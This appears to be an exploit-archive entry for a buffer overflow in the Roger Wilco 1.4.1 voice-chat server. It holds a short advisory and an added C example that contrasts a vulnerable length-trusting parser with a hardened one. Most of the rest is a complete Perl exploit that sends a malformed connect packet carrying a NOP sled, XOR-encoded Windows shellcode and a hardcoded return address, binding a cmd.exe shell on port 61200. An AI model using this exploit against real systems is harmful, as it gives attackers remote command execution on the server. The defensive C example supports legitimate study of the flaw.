
Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun Vulnerability

Published: 01 Jul 2014
Reported by: RootType
Source: seebug (www.seebug.org)


Code

source: http://www.securityfocus.com/bid/8566/info

A vulnerability has been reported in various Roger Wilco server releases. The flaw is server-side and is triggered while the server processes a malformed client packet. When a client connects, it sends a packet that carries the size of the data the server should copy into an internal buffer. The server trusts that size, so a malicious client can declare a length larger than the previously allocated buffer and have the excess data copied into it. This corrupts server memory and can ultimately allow execution of arbitrary code.
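The pattern described above, as an added example that is not taken from the advisory or from Roger Wilco's own code: a minimal record parser that receives a client-supplied length, shown in the vulnerable form beside a hardened one. The record layout used here (0x0F marker, type byte, 16-bit big-endian length, value) is a hypothetical simplification modelled on the trailing records in the exploit below, and the 64-byte destination buffer is an assumption; the advisory does not state the real sizes.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed fixed-size destination buffer; the real server's size is not
 * stated in the advisory. */
#define CHANNEL_BUF_SIZE 64

/* Record layout assumed for this example (not Roger Wilco's actual wire
 * format): [0x0F][type][len_hi][len_lo][value ...], length big-endian. */
#define RECORD_HDR_LEN 4

/* Vulnerable pattern: the server trusts the client-supplied length and copies
 * that many bytes into a fixed buffer. A declared length larger than
 * CHANNEL_BUF_SIZE overwrites whatever follows the buffer on the stack. */
size_t parse_record_unsafe(const uint8_t *pkt, size_t pkt_len,
                           uint8_t out[CHANNEL_BUF_SIZE])
{
    (void)pkt_len;                                 /* received size is ignored */
    size_t len = ((size_t)pkt[2] << 8) | pkt[3];   /* attacker-controlled */
    memcpy(out, pkt + RECORD_HDR_LEN, len);        /* unbounded copy */
    return len;
}

/* Hardened version: validate the declared length against both the number of
 * bytes actually received and the capacity of the destination buffer before
 * copying. Returns the number of bytes copied, or 0 if the record is rejected. */
size_t parse_record_safe(const uint8_t *pkt, size_t pkt_len,
                         uint8_t out[CHANNEL_BUF_SIZE])
{
    if (pkt == NULL || pkt_len < RECORD_HDR_LEN || pkt[0] != 0x0F)
        return 0;                                  /* truncated or not a record */
    size_t len = ((size_t)pkt[2] << 8) | pkt[3];
    if (len > pkt_len - RECORD_HDR_LEN)
        return 0;                                  /* claims more than was received */
    if (len > CHANNEL_BUF_SIZE)
        return 0;                                  /* would overflow the buffer */
    memcpy(out, pkt + RECORD_HDR_LEN, len);
    return len;
}

/* Build a record with the given declared length and value (constructed sample
 * input, not captured traffic). Returns the total packet length, 0 on error. */
size_t build_record(uint8_t *pkt, size_t cap, uint8_t type,
                    uint16_t declared_len, const uint8_t *value, size_t value_len)
{
    if (cap < RECORD_HDR_LEN + value_len)
        return 0;
    pkt[0] = 0x0F;
    pkt[1] = type;
    pkt[2] = (uint8_t)(declared_len >> 8);
    pkt[3] = (uint8_t)(declared_len & 0xFF);
    memcpy(pkt + RECORD_HDR_LEN, value, value_len);
    return RECORD_HDR_LEN + value_len;
}

int main(void)
{
    uint8_t pkt[2048];
    uint8_t out[CHANNEL_BUF_SIZE];

    /* Benign client: declared length matches a short channel name. */
    const uint8_t name[] = "channel";                  /* 8 bytes incl. NUL */
    size_t n = build_record(pkt, sizeof pkt, 0x00, sizeof name, name, sizeof name);
    printf("benign:   copied %zu bytes\n", parse_record_safe(pkt, n, out));

    /* Malicious client: declares 0x0508 bytes (the value the exploit sends)
     * and really sends them. parse_record_unsafe would write 1288 bytes into
     * a 64-byte buffer; parse_record_safe rejects the record instead. */
    uint8_t sled[0x0508];
    memset(sled, 0x90, sizeof sled);
    n = build_record(pkt, sizeof pkt, 0x00, 0x0508, sled, sizeof sled);
    printf("oversize: copied %zu bytes (0 = rejected)\n", parse_record_safe(pkt, n, out));

    /* Lying client: declares 0x0508 but sends only 8 bytes; also rejected,
     * so the server never reads past the end of what it received. */
    n = build_record(pkt, sizeof pkt, 0x00, 0x0508, name, sizeof name);
    printf("short:    copied %zu bytes (0 = rejected)\n", parse_record_safe(pkt, n, out));
    return 0;
}
```

The two checks in `parse_record_safe` are independent: the first stops an over-read of the receive buffer, the second stops the overflow of the destination; a fix that adds only one of them leaves the other bug in place.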

#!/usr/bin/perl
#
#       RogerWilco v1.4.1.6 remote buffer overflow exploit
#  ...just for fun
#
# Binds a cmd.exe shell on port 61200.
# Retaddr 0x0122fa44 will work only if roger.exe has md5
# checksum 89f2d9cda1abc1f55cd06181fbdd6e43 (v.1.4.1.6).
# It does not matter which win32 operating system is installed
# (winxp/2k/nt/me/9x/03).
# Btw, RogerWilco is a kewl Internet Voice chat for gamers (hm).
# Vendor: rogerwilco.gamespy.com.
# Bug found by Auriemma Luigi (hey dude in da third time ;])
# Advisory: security.nnov.ru/search/document.asp?docid=5074
#
# Greets to all ppl from #m00sec #nerf and #priv8security (EFnet)
#
# d4rkgr3y [[email protected]] // m00 [www.m00.ru]
#

use strict;
use warnings;
use IO::Socket;

my $host    = "127.0.0.1";            # target Roger Wilco server
my $port    = "3782";                 # server port
my $retaddr = "\x44\xfa\x22\x01";     # 0x0122fa44, little-endian; valid only for the build above

# Stage 1: register setup plus a small XOR decoder that unpacks the port-binding
# payload in place. eax is loaded with the fixed address at which the payload
# lands in the server process (0x0122F020), so the decoder depends on the
# buffer always sitting at that address.
my $shellcode =
	"\x33\xff". #xor edi,edi
	"\x33\xf6". #xor esi,esi
	"\x33\xdb". #xor ebx,ebx
	"\xB8\x01\xF0\x22\x01". #mov eax,122F020
	#"\xcc". #int3 (uncomment to break into an attached debugger)
	"\x83\xC0\x15\x33\xC9\x66\xB9\xD1\x01\x80\x30\x96\x40\xE2\xFA". #decryptor: add eax,15h / xor ecx,ecx / mov cx,1D1h / xor byte [eax],96h / inc eax / loop
	#winxp/2k xored portbind shellcode: 0x1D1 = 465 bytes, each XORed with 0x96
	"\x15\x7A\xA2\x1D\x62\x7E\xD1\x97\x96\x96\x1F\x90\x69\xA0\xFE\x18\xD8\x98\x7A\x7E\xF7".
	"\x97\x96\x96\x1F\xD0\x9E\x69\xA0\xFE\x3B\x4F\x93\x58\x7E\xC4\x97\x96\x96\x1F\xD0".
	"\x9A\xFE\xFA\xFA\x96\x96\xFE\xA5\xA4\xB8\xF2\xFE\xE1\xE5\xA4\xC9\xC2\x69\xC0\x9E".
	"\x1F\xD0\x92\x69\xA0\xFE\xE4\x68\x25\x80\x7E\xBB\x97\x96\x96\x1F\xD0\x86\x69\xA0".
	"\xFE\xE8\x4E\x74\xE5\x7E\x88\x97\x96\x96\x1F\xD0\x82\x69\xE0\x92\xFE\x5D\x7B\x6A".
	"\xAD\x7E\x98\x97\x96\x96\x1F\xD0\x8E\x69\xE0\x92\xFE\x4F\x9F\x63\x3B\x7E\x68\x96".
	"\x96\x96\x1F\xD0\x8A\x69\xE0\x92\xFE\x32\x8C\xE6\x51\x7E\x78\x96\x96\x96\x1F\xD0".
	"\xB6\x69\xE0\x92\xFE\x32\x3B\xB8\x7F\x7E\x48\x96\x96\x96\x1F\xD0\xB2\x69\xE0\x92".
	"\xFE\x73\xDF\x10\xDF\x7E\x58\x96\x96\x96\x1F\xD0\xBE\x69\xE0\x92\xFE\x71\xEF\x50".
	"\xEF\x7E\x28\x96\x96\x96\x1F\xD0\xBA\xA5\x69\x17\x7A\x06\x97\x96\x96\xC2\xFE\x97".
	"\x97\x96\x96\x69\xC0\x8E\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6\x69\xC0\x8A\x1D\x4E\xC1".
	"\xC1\xFE\x94\x96\x79\x86\x1D\x5A\xFC\x80\xC7\xC5\x69\xC0\xB6\xC1\xC5\x69\xC0\xB2".
	"\xC1\xC7\xC5\x69\xC0\xBE\x1D\x46\xFE\xF3\xEE\xF3\x96\xFE\xF5\xFB\xF2\xB8\x1F\xF0".
	"\xA6\x15\x7A\xC2\x1B\xAA\xB2\xA5\x56\xA5\x5F\x15\x57\x83\x3D\x74\x6B\x50\xD2\xB2".
	"\x86\xD2\x68\xD2\xB2\xAB\x1F\xC2\xB2\xDE\x1F\xC2\xB2\xDA\x1F\xC2\xB2\xC6\x1B\xD2".
	"\xB2\x86\xC2\xC6\xC7\xC7\xC7\xFC\x97\xC7\xC7\x69\xE0\xA6\xC7\x69\xC0\x86\x1D\x5A".
	"\xFC\x69\x69\xA7\x69\xC0\x9A\x1D\x5E\xC1\x69\xC0\xBA\x69\xC0\x82\xC3\xC0\xF2\x37".
	"\xA6\x96\x96\x96\x13\x56\xEE\x9A\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\x7D\x9F".
	"\x1D\xD6\xA2\x1D\x3E\x2E\x96\x96\x96\x1D\x53\xC8\xCB\x54\x92\x96\xC5\xC3\xC0\xC1".
	"\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D\xDC\x8E\x1D\xCC\xB6\x95".
	"\x4B\x75\xA4\xDF\x1D\xA2\x1D\x95\x63\xA5\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x91\x57".
	"\x59\x9B\x95\x6E\x7D\x64\xAD\xEA\xB2\x82\xE3\x77\x1D\xCC\xB2\x95\x4B\xF0\x1D\x9A".
	"\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x94\xA5\x56\x1D\x43\xC9\xC8\xCB".
	"\xCD\x54\x92\x96";

# Overflow body: NOP sled, shellcode, NOP tail, followed by the return address
# that overwrites the saved EIP.
my $execode = "\x90" x (1263 - 200 - 490);
$execode .= $shellcode;
$execode .= "\x90" x 200;

print "\n\rRogerWilco v1.4.1.6 remote buffer overflow exploit\n\n=> Connecting to $host:$port.. ";
my $socket = IO::Socket::INET->new(
	PeerAddr => $host,
	PeerPort => $port,
	Proto    => "tcp",
	Type     => SOCK_STREAM,
) or die " damn\n";
print "ok\n=> Sending exploit buffer... ";

# Malformed connect packet. Judging by the trailing records, each record is
# 0x0F, a type byte, a 16-bit length and the value; the length field of the
# first record (0x0508) is the client-supplied size the server trusts.
my $buf =
	"\x0F\x00\x05\x08\x6A\xD6\x4C\x03".
	"\x96\xED\x3B\xE7\x88\xE2\xA9\x74".
	"channel".
	"\x00".
	$execode.
	$retaddr.
	"\x0F\x10\x00\x04".
	"d4rk".
	"\x0F\x11\x00\x04\x00\x00\x00\x02".
	"\x0F\x12\x00\x04\x00\x00\x00\x00";

print $socket $buf;
print "ok\n=> Exiting... \n\n";
sleep(2);

close($socket);


